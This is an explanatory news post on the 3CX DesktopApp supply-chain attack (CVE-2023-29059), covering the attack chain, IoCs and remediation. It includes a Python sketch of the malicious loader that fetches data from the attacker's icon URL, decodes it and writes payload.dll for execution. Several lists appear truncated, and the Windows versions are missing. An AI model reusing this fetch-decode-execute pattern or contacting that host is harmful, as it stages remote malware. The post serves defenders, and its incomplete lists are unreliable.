CVE CyberSecurity Database News

CVE-2023-29059 - The 3CX DesktopApp Supply Chain Attack Explained

Poster -

March 2023 sent shockwaves through the security world when news broke about a supply chain attack involving the widely-used 3CX DesktopApp VoIP software. The vulnerability — now tracked as CVE-2023-29059 — revealed something chilling: malicious code embedded inside the official 3CX installer itself. In this long post, we'll break down what happened, how it worked, and what you can do about it.

What is CVE-2023-29059?

CVE-2023-29059 refers to a malicious compromise of the 3CX DesktopApp client for both Windows and macOS platforms. Attackers managed to insert malicious code into signed binaries distributed by 3CX in their official updates. The trojanized software was then downloaded and installed by unsuspecting users all over the world, putting thousands of organizations at risk.

macOS: 18.11.1213, 18.12.402, 18.12.407, 18.12.416

If you used or deployed 3CX during March 2023 and have any of these versions, you should take immediate action.

How Did the Attack Work?

This was a classic supply chain attack. The attackers gained access to the 3CX build environment, injected their own code into the app, and let the standard update process spread the malware. The applications remained properly signed, so endpoint security products did not raise alarms.

Upon launching, the trojanized 3CX DesktopApp would

1. Fetch an Icon File: The compromised binary loaded an external .ico file from a hardcoded URL (such as https://raw.githubusercontent.com/IconStorages/images/main/icon.ico).
2. Extract Malicious Data: Inside this "icon" file, there was heavily obfuscated, base64-encoded data.
3. Download a Second-Stage Payload: The extracted data pointed the malware to fetch a DLL or shellcode from another location.

Here’s a simplified Python-style pseudo-snippet showing what the malicious loader did

import base64
import requests

# Step 1: Download the icon (but really a data blob)
icon_url = "https://raw.githubusercontent.com/IconStorages/images/main/icon.ico"
icon_data = requests.get(icon_url).content

# Step 2: Extract hidden base64 section (example logic)
def extract_hidden_payload(data):
    # Real code uses complex offsets/logic
    return data[100:300]  # placeholder

encoded_payload = extract_hidden_payload(icon_data)
decoded_payload = base64.b64decode(encoded_payload)

# Step 3: Use payload as DLL or shellcode (dangerous!)
with open("payload.dll", "wb") as f:
    f.write(decoded_payload)
# then load and execute as malware

> WARNING: Never run suspicious code copied from the Internet!

What Does the Exploit Enable?

The attackers got what every threat group wants — a legitimate, trusted piece of software, running in sensitive enterprise environments, secretly under their control.

Lateral movement across corporate networks.

Many believe the attack was conducted by a highly sophisticated group, as discussed here.

Early March 2023: Malicious versions begin circulating.

- End of March 2023: Multiple security companies, including CrowdStrike and SentinelOne, flag the issue publicly.
- 3CX Issues Warning and Update: The company recommends uninstalling affected clients and releases clean versions.

Security vendors published IoCs including

- Malicious URLs (e.g. https[:]//raw.githubusercontent.com/IconStorages/images/main/icon.ico)

Uninstall vulnerable versions immediately.

2. Deploy the latest, patched version from 3CX's site.
3. Scan your systems using security tools and published IoCs.

References & Further Reading

- 3CX Security Alert and Response
- CrowdStrike Report on 3CX Attack
- Cisco Talos Write-Up
- SentinelOne Analysis
- Github IoCs and Detection Tools
- NVD CVE Database Entry

Summary

CVE-2023-29059 is a dramatic reminder: *Even trusted software from reputable vendors can be weaponized.* This attack didn’t exploit a coding bug — it exploited the trust we put in software updates. If you use software like 3CX, always stay up to date with security advisories and be ready to act fast.

If you found this breakdown helpful, spread the word — supply chain attacks are everyone’s problem.

Timeline

Published on: 03/30/2023 17:15:00 UTC
Last modified on: 04/10/2023 16:29:00 UTC